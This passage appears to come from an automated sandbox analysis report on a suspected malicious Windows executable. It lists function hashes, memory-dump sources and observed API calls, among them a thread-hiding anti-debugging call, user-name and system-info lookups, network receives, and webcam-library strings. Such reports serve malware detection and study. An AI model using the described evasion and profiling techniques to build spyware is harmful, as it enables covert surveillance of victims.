Opcode Fuzzy Hash: 20bf40000410b30cb428fd7eaa5d8617cd36eaa3c3867128964d0c3a64d774ed
Instruction Fuzzy Hash: 6E11C173B082598FE754DA6EE8406EBF7D5FBD4271B048137E514C7640EA359811C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 06FBF5C9, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8fd53c556cc64ee029f3f1147b85dd61997d8d6972ba3fcbc0795269925ea8
Instruction ID: 2afa60bdbc5f8bcc8b758ef80cc96952b0e18e58297c2f1a687c690b62e196b1
Opcode Fuzzy Hash: 0a8fd53c556cc64ee029f3f1147b85dd61997d8d6972ba3fcbc0795269925ea8
Instruction Fuzzy Hash: F4112721B0E3915FD702AB359C245E63FEA8F8711170504E6E845C73A2DE14CC02C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 009FD3AC, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326797337.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b51698b0ed149adc21246af3bfb2c7b1d0e66efe6214e1a3936fa069f0a9f04
Instruction ID: 1b554e86ee313bb94e24eb055bfc47f95c89af494de0a05584e48867ddb7c73f
Opcode Fuzzy Hash: 1b51698b0ed149adc21246af3bfb2c7b1d0e66efe6214e1a3936fa069f0a9f04
Instruction Fuzzy Hash: 982138B1505208DFC701DF14D9C0B36BBAAFB84718F20C969DA094B281C779EC46D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 06F30630, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342215389.0000000006F30000.00000040.00000001.sdmp, Offset: 06F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef637c9c0db22ae01f64c20bf60cfcad47ac52ed0e31f704bf9375039f5bbe78
Instruction ID: b682e4fe8e4cc056c22fef4e91c728dd06e59a4a7656651c3c912cff529313a3
Opcode Fuzzy Hash: ef637c9c0db22ae01f64c20bf60cfcad47ac52ed0e31f704bf9375039f5bbe78
Instruction Fuzzy Hash: 1711EB32B003219FDBD8566AD41067AF7A6DFD5625B1C803FDA4A87348DE71D9C2C790

Uniqueness

Uniqueness Score: -1.00%

Function 009FD006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326797337.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b458f4a7d62f67bbd3022a9728dab27b1e933040525190d224f3e9c0635c0a5
Instruction ID: 1fe539c5d713d7305599a39a4ea8932dbc43213ea6930d1155ee5376e8c50c65
Opcode Fuzzy Hash: 9b458f4a7d62f67bbd3022a9728dab27b1e933040525190d224f3e9c0635c0a5
Instruction Fuzzy Hash: 4A21B0354093C48FCB02CF20C990711BF71EB46314F28C1EAC8488B297C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 009ED1F7, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326744980.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab898f1c6ab74212a29baec6bd362927df378e6c3e01bd4b77bdae7e85799e0
Instruction ID: 96682dd1bac42bd66e518b28986174c850e065721ff79d3f67a9da737219ecc3
Opcode Fuzzy Hash: 2ab898f1c6ab74212a29baec6bd362927df378e6c3e01bd4b77bdae7e85799e0
Instruction Fuzzy Hash: 86219D76404280DFDB16CF50D9C4B56BF61FB84310F24C6A9DD040B656C33AD86ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009ED3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326744980.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
Instruction ID: 6a4fb9b27b2fa9ba39b848cebc3ab161ba2515618253d82a8fc93909eeb53cda
Opcode Fuzzy Hash: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
Instruction Fuzzy Hash: FB11E676404280DFDF12CF10D5C4B16BF71FBA4324F24C6A9D8090B6A6D33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06FB6608, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47aaf69af67901341a3dac6270ba4d3eded418084ce5eccce4d2b3d7b92d28ec
Instruction ID: f0a2027b1fea016fd460667794b8d099cb38a3a87261d636dc79a769b1f3715d
Opcode Fuzzy Hash: 47aaf69af67901341a3dac6270ba4d3eded418084ce5eccce4d2b3d7b92d28ec
Instruction Fuzzy Hash: 7701C476A00119EFCF119FA5D9449AFBBB6EFC8311B14402AE505D7310D7318916CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 009FD3A7, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326797337.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646dd4adab6d87037fbba390e1aa4c276690e0fba5f49f4a289d7c9cdc80154c
Instruction ID: 7c94aead9f17dd54164bccd8c627f746e9390ca13a37be52e65031a12e57e85a
Opcode Fuzzy Hash: 646dd4adab6d87037fbba390e1aa4c276690e0fba5f49f4a289d7c9cdc80154c
Instruction Fuzzy Hash: F011E371505284CFCB11CF14D5C4726FBB2FB85724F24C6AAC8494B696C33AE84ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 06F30610, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342215389.0000000006F30000.00000040.00000001.sdmp, Offset: 06F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866406ffd7654ce28bae827e930f4540bc46501191697825e07de9d6f214da7a
Instruction ID: 067e560dc01ae3f2cc47608c6ebb566c67acf6a2c9d92c7b7e75e5a50f171337
Opcode Fuzzy Hash: 866406ffd7654ce28bae827e930f4540bc46501191697825e07de9d6f214da7a
Instruction Fuzzy Hash: 8801F736A0E3919FD7970A258C116A2BF399FC3610B1D40D7E504CB196DA7489C4CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 06FBF67F, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a3404647de7f473bbc657e7542fb43ec500d4e1d977aec4361e7c09ba5ac1d9
Instruction ID: 10384c550b5c764e26375a97fc1d2c64cd24313160199314dd68be5aba27b6d6
Opcode Fuzzy Hash: 9a3404647de7f473bbc657e7542fb43ec500d4e1d977aec4361e7c09ba5ac1d9
Instruction Fuzzy Hash: 47018F36205A409FC714CF2ADC88D66BBFAFF89221314069AF19AC7771D761EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06FB6618, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0820f67aa6a2df793f10081587273693bec348f06989c0572ebbbfaa9cad263
Instruction ID: 05c2a57dd8199fd1beab4a2425f801b8b53753dcd527755eb75a22afafe809d5
Opcode Fuzzy Hash: a0820f67aa6a2df793f10081587273693bec348f06989c0572ebbbfaa9cad263
Instruction Fuzzy Hash: 88118476B00219AFCF44DF69D8448AEBBB6FF88311B14812AEA15D7310DB31D941CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 06FB83D8, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4cce86f98f58000053c022e55351e84581e0a60d35dd847b9ef86338e2fe8b
Instruction ID: d6c0a1be5f257ebed110770cce37812b568a9369982088d7f7b8c601edee1014
Opcode Fuzzy Hash: 6c4cce86f98f58000053c022e55351e84581e0a60d35dd847b9ef86338e2fe8b
Instruction Fuzzy Hash: B8119E356002059FCB04DF28D888D9ABBF6FF89324B118459E919CB322CB71ED02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06FB1060, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae28fd9b03a7a4df677036647196003fb50748974be16d6265387368c67aa62
Instruction ID: 0113aeaa611eab1e02e9d4e945d38bbf0463e335c6c5e83e856537ca9dff9134
Opcode Fuzzy Hash: cae28fd9b03a7a4df677036647196003fb50748974be16d6265387368c67aa62
Instruction Fuzzy Hash: E901D2307043448BC728CE2794A0467B7A6AFC92A4324A43EC84647744CE32D856CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06FB91E8, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c950114af488d6797be9d8ed487c733de92db2da2294684177396c1867086612
Instruction ID: b77b33646adcf7a702427fff822126f6c42aa01455572c29daa0de0ae70a4173
Opcode Fuzzy Hash: c950114af488d6797be9d8ed487c733de92db2da2294684177396c1867086612
Instruction Fuzzy Hash: C5F0BE33F1C2288F8B88DEBEB4004EABBE9EB4612571450ABF20DC7250EA71D940C794

Uniqueness

Uniqueness Score: -1.00%

Function 06FB7080, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d099766a83beb755b9afe1a4747f05e37ba818643a6bb75d817c9f39a392c34
Instruction ID: 175b0c40df0907584e10dcc3223146285f0b81b326e12fc6110af886b3c0b79d
Opcode Fuzzy Hash: 3d099766a83beb755b9afe1a4747f05e37ba818643a6bb75d817c9f39a392c34
Instruction Fuzzy Hash: 77E09B377152159BD754652BA8443A7B5DFDBC06A2F10743BF10BC3241CB66DD4487B1

Uniqueness

Uniqueness Score: -1.00%

Function 06FBF990, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2062e75a094846a2ffe09298121c3dacbdbbebc7394a634d402822effb1c76
Instruction ID: 922a8ddb95eb45dd892ec98753dfa50f96bedb5cf028f7eed8eecf295154b08f
Opcode Fuzzy Hash: 2b2062e75a094846a2ffe09298121c3dacbdbbebc7394a634d402822effb1c76
Instruction Fuzzy Hash: 81E092327000147B87545A1F9C809AF7BDF9FCEA60794807AF159DB365DA61CC0293A0

Uniqueness

Uniqueness Score: -1.00%

Function 06FBA0F0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99baf404d410fc38804521c59fc382a9e724112cdc05281f3025c5e03045d5d7
Instruction ID: 1e8ee3031e2a222de5a0dd6736af42c02fc4573ebf02924d0a41a43244d63f6b
Opcode Fuzzy Hash: 99baf404d410fc38804521c59fc382a9e724112cdc05281f3025c5e03045d5d7
Instruction Fuzzy Hash: C9D05E76B05354274715268F688A96BBA8EE7C9535355003AF909C3300DD948C0242A0

Uniqueness

Uniqueness Score: -1.00%

Function 06FB138E, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 772a0ae7e1797d90de025631c0c49abea0e83bb3a15838185e97cc04534a7b3f
Instruction ID: 2619d15ca1956abcf97fc20dec48675da8a207519ab48225d2a941c6f743ef37
Opcode Fuzzy Hash: 772a0ae7e1797d90de025631c0c49abea0e83bb3a15838185e97cc04534a7b3f
Instruction Fuzzy Hash: 1CD012B2704205AFAB566B119C868BFBF1AEBC11B4314410AF5CA56590D6274C119791

Uniqueness

Uniqueness Score: -1.00%

Function 06FB3D53, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1c001c6bd7502b34727e2f4bbc91c40129274fb5c8e06b9f7a286b712bc949
Instruction ID: e5143e93a43ed7ad0b2a4d57ca9284d1209dc5cd6e0a140717f1a60f6f1f1de4
Opcode Fuzzy Hash: 0b1c001c6bd7502b34727e2f4bbc91c40129274fb5c8e06b9f7a286b712bc949
Instruction Fuzzy Hash: 07D05E32640208CFCB109FB0E908AA637EA9F48209B140598E98D87161E733D812CA40

Uniqueness

Uniqueness Score: -1.00%

Function 06FB93F4, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4413be3c0fabd71dbd4dd1c67f92d649353a527b33f20a9ff886740826bebc0
Instruction ID: 2b408cbe90988acffe6d131cc14460b468079682fffb6aba426230c79404b0d5
Opcode Fuzzy Hash: a4413be3c0fabd71dbd4dd1c67f92d649353a527b33f20a9ff886740826bebc0
Instruction Fuzzy Hash: 35D01235B00008DF8B84DFAFE0505DC7BF5EF89215B0110AAE31AC7220DB709D158F81

Uniqueness

Uniqueness Score: -1.00%

Function 06FB965C, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d901ee1e96154b9a12d0e80028d1b47bba919c6c5b24c44f4fa776e227f2d4
Instruction ID: fa68cec5ebb4c98f5971f604750401d85c35760595eb652465ad7e2c8514f392
Opcode Fuzzy Hash: 79d901ee1e96154b9a12d0e80028d1b47bba919c6c5b24c44f4fa776e227f2d4
Instruction Fuzzy Hash: 1FD0123A7400048F8784DE5EE0145EC73B2DF8821970110A6E306C7675DB709C55CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 06FB95BA, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c923b3418ed6b391f1abc5ec8298d07ec9016484f5a8a21c82dc2767e7b8eaa8
Instruction ID: efa018b4be4a81c20f2703fc581f90d969d4314f69448df62f6f0676b309d135
Opcode Fuzzy Hash: c923b3418ed6b391f1abc5ec8298d07ec9016484f5a8a21c82dc2767e7b8eaa8
Instruction Fuzzy Hash: 75D01239710004CF8784DE6FE0104D877B5EF8851670100E6E306C7261DB609C158781

Uniqueness

Uniqueness Score: -1.00%

Function 06FB8FB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268afec48e8da671aecbdca5a43a2f80051697d24d924b202f145ac00cc66c95
Instruction ID: 4cc7a09b77012dd18e0f8fc4f352b1be815c9a6f03806559cd530139fd54197e
Opcode Fuzzy Hash: 268afec48e8da671aecbdca5a43a2f80051697d24d924b202f145ac00cc66c95
Instruction Fuzzy Hash: 9AC0126260D2809FC305CB119D558877B625AD2301715C6D6E94887266E6310E25C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 06FB0FD0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e46783c27532b861dee0a66b0f1ee8cb3d354affc8fc8965ef7024fcb997a2f
Instruction ID: 8a68ae16d83ae42710e36a222560bb4267a8fe30e2de323f0c78af34fff5b6d6
Opcode Fuzzy Hash: 5e46783c27532b861dee0a66b0f1ee8cb3d354affc8fc8965ef7024fcb997a2f
Instruction Fuzzy Hash: 97C04C916493C14FFF0347309C94B473F235B82349F0A849793D1C76E2C52E58258393

Uniqueness

Uniqueness Score: -1.00%

Function 06FB9A00, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f75763d22a074e055458a30d25c4b8fe9808909247956c4e8b9ce34cb9dcd1
Instruction ID: e464dfa576017554e9046990393a0507f81bb1d3bea44fd65ffc378ffbb7d975
Opcode Fuzzy Hash: 97f75763d22a074e055458a30d25c4b8fe9808909247956c4e8b9ce34cb9dcd1
Instruction Fuzzy Hash: A4C04C3A740014CFCB04DB59E5558E87BB5EB8962670540A6E309C7121D761E9148B80

Uniqueness

Uniqueness Score: -1.00%

Function 06FBA0B8, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac01340c2c6973717a4599cd376fbcf3aa46a37dff42bae1ebed22d7f8f90a59
Instruction ID: 7ae2741155803fd7181a7c76dec901b26b8fb1795a22cafa5edc5f7329d42d25
Opcode Fuzzy Hash: ac01340c2c6973717a4599cd376fbcf3aa46a37dff42bae1ebed22d7f8f90a59
Instruction Fuzzy Hash: E9D0C99185F3C27ECB525B34646A6003EA05E5311132906D9D4E58B1D3C6480849C721

Uniqueness

Uniqueness Score: -1.00%

Function 06FB99B7, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a7a3705b971bc8c2e10cb64301edf7fb072308692814b4a2c82771a5895503
Instruction ID: 9ee82896377f05a5853b0f1c37664f82dca327a5d589c43417ef14b2ee1e5f94
Opcode Fuzzy Hash: d5a7a3705b971bc8c2e10cb64301edf7fb072308692814b4a2c82771a5895503
Instruction Fuzzy Hash: 35C04C3A740014CFDB00DA59E4554E87775EB8962670000A6E305C7121D76199158B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0240E550, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db89be9f83adcd058e854dcb2110d77a2126ffafeaa353edf642133375762e31
Instruction ID: 5a49210999cf21f8f7af40690275350f96b9c66ca208b607f8b387112d6c8ee1
Opcode Fuzzy Hash: db89be9f83adcd058e854dcb2110d77a2126ffafeaa353edf642133375762e31
Instruction Fuzzy Hash: 6C12B3F1C13766AAE310CF65E89C5893BA0FB65329B914209D2631FAE4D7BC194BCF44

Uniqueness

Uniqueness Score: -1.00%

Function 0240C104, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b7939c6199216d21300cf871476974012fe2131e2180bb13d73566c058c8188
Instruction ID: 30dd2c3ad0a6a075c07a2d74f0d60c68e8fcc78c5d05ff1c146f3b859f831a9a
Opcode Fuzzy Hash: 8b7939c6199216d21300cf871476974012fe2131e2180bb13d73566c058c8188
Instruction Fuzzy Hash: E2A15F32E00219CFCF15DFA5C88499EB7B2FF85304B15857BE915AB2A0EB35A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0240E540, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9936e73fb214d259cb3069162239125c0741013b1b7140253674a5ecbd580273
Instruction ID: f02f032fc3e5db71961d17b9326e5dfa38eb339f8ace4a03cb23d33437966555
Opcode Fuzzy Hash: 9936e73fb214d259cb3069162239125c0741013b1b7140253674a5ecbd580273
Instruction Fuzzy Hash: 68C106B1C13766ABD710CF65E8981897BB1FBA5328B914209D1632F6E4D7BC184BCF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 0kEuVjiCbh.exe PID: 1832 Parent PID: 5952 0kEuVjiCbh.exeCOMMON

Executed Functions

Function 0047DA23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105threadlibrarynativeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0047DA28
GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
GetProcAddress.KERNEL32(00000000), ref: 0047DADE
GetCurrentThread.KERNEL32 ref: 0047DB16
NtSetInformationThread.NTDLL(?,00000011,00000000,00000000,?,?,00000000,00000000), ref: 0047DB1D

Strings

A, xrefs: 0047DAA1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Thread$AddressCurrentH_prologHandleInformationModuleProc
String ID: A
API String ID: 2756751113-3554254475
Opcode ID: be64283b3c99eb43cfab408730693492dcc37ded62b0fa0dcaa4628b277c118a
Instruction ID: 44a9092eb4fce4f9afff90697c039c15edd499dcc9c00362b295a7f757c6932a
Opcode Fuzzy Hash: be64283b3c99eb43cfab408730693492dcc37ded62b0fa0dcaa4628b277c118a
Instruction Fuzzy Hash: 01312471D153499ADB10CFFD99806EDFBB8BF65304F10517EE809AB201E7749E488724

Uniqueness

Uniqueness Score: -1.00%

Function 0044DE59, Relevance: 9.1, APIs: 6, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044DE5E
new.LIBCMT ref: 0044DE84
GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
GetProcAddress.KERNEL32(?,?), ref: 0044DF6C
GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 0044DFC6
GetProductInfo.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0044DFD8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info$AddressH_prologHandleModuleProcProductSystem
String ID:
API String ID: 1760484215-0
Opcode ID: 8d3f5454c2a74863711223ec7fd465ebed71a542e2defed12db04a0b8bb6a757
Instruction ID: 0b433a4e069d78135e3db23fed4c592dc4d79eab52225e25e556f3b17f67ecdd
Opcode Fuzzy Hash: 8d3f5454c2a74863711223ec7fd465ebed71a542e2defed12db04a0b8bb6a757
Instruction Fuzzy Hash: 0B513B32D04349AAEB11DFB8DC81AEEFBB4FF55310F10412EE949A7252EB345A888710

Uniqueness

Uniqueness Score: -1.00%

Function 0041369B, Relevance: 7.6, APIs: 5, Instructions: 128timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004136A0

Part of subcall function 004138F8: __EH_prolog.LIBCMT ref: 004138FD
Part of subcall function 004138F8: GetTickCount64.KERNEL32 ref: 0041391A

GetSystemTimes.KERNELBASE(?,?,?), ref: 0041370A
GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00413724
GetProcessTimes.KERNELBASE(00000000), ref: 0041372B
GetTickCount64.KERNEL32 ref: 00413823

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Count64H_prologProcessTickTimes$CurrentSystem
String ID:
API String ID: 2284428309-0
Opcode ID: 236d7e2644c345143adb0c189a4fec71ec096c75c1f097dc3eab28c4d6001a43
Instruction ID: a254041eaa7e4b0b50e61da91e07f6796d4f1d516a85174cce91633ffafc66c9
Opcode Fuzzy Hash: 236d7e2644c345143adb0c189a4fec71ec096c75c1f097dc3eab28c4d6001a43
Instruction Fuzzy Hash: 08510AF5D002589FCB14DFE9D8819DEBBB9FB89701F00852AE505E7312E7385986CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00471490, Relevance: 3.1, APIs: 2, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00471495
GetUserNameW.ADVAPI32(00000000,?), ref: 004714E1

Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateNameUserstd::_
String ID:
API String ID: 1695679120-0
Opcode ID: eec31fea01fd388527b5897a7d7f80c611d1fd69a0350a118c676f95651220e3
Instruction ID: d655e893a5e8ff1d491b0e6926b5f2c26dfcdca79071f98dadbf90846d52d241
Opcode Fuzzy Hash: eec31fea01fd388527b5897a7d7f80c611d1fd69a0350a118c676f95651220e3
Instruction Fuzzy Hash: 2A218D71D042489FDB14EFACD985AEEBBF8EF09704F10456EE006E7281DBB45A05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00415782, Relevance: 1.6, APIs: 1, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 004157A1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: c62c7c3c7b8fe5f77f2d802cc1d1c4721b2ce0b15eb23c3f888527f01b87accb
Instruction ID: 5bea4bdaf11f897f62dfeb54fd0e94af83be17af8b353cdab7f5e046acebae1d
Opcode Fuzzy Hash: c62c7c3c7b8fe5f77f2d802cc1d1c4721b2ce0b15eb23c3f888527f01b87accb
Instruction Fuzzy Hash: 1211E5B1A0070AEFDB208F95C8824FBF768EB80764F20416BF82553380D7785D908795

Uniqueness

Uniqueness Score: -1.00%

Function 00571F0B, Relevance: 52.7, APIs: 3, Strings: 27, Instructions: 171COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00571F10
new.LIBCMT ref: 00571F37

Part of subcall function 005717F8: __EH_prolog.LIBCMT ref: 005717FD
Part of subcall function 005717F8: new.LIBCMT ref: 0057182A
Part of subcall function 005717F8: InitializeCriticalSection.KERNEL32(0000001C,00000000,007A4460,?,?,00571F4A,?,?,?,0040F09B), ref: 0057184D
Part of subcall function 005717F8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00571F4A,?,?,?,0040F09B), ref: 00571864

_wprintf.LEGACY_STDIO_DEFINITIONS ref: 00571F78

Strings

Y211, xrefs: 0057203B
Y41P, xrefs: 0057202D
YUYV, xrefs: 00571FD4
YUYV, xrefs: 00571FD9
I420, xrefs: 00572099
IYUV, xrefs: 00571FE7
***** VIDEOINPUT LIBRARY - %2.04f - TFW07 *****, xrefs: 00571F73
Y41P, xrefs: 00572028
MJPG, xrefs: 00572061
UYVY, xrefs: 00571FF5
YV12, xrefs: 00571FFE
YVU9, xrefs: 0057200C
YVYU, xrefs: 00571FCB
AYUV, xrefs: 00572053
YVU9, xrefs: 00572011
Y411, xrefs: 0057201A
IYUV, xrefs: 00571FE2
MJPG, xrefs: 00572066
YVYU, xrefs: 00571FC6
I420, xrefs: 0057209E
YUY2, xrefs: 00571FBD
UYVY, xrefs: 00571FF0
Y211, xrefs: 00572036
AYUV, xrefs: 00572058
YUY2, xrefs: 00571FB8
Y411, xrefs: 0057201F
YV12, xrefs: 00572003

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$CreateCriticalEventInitializeSection_wprintf
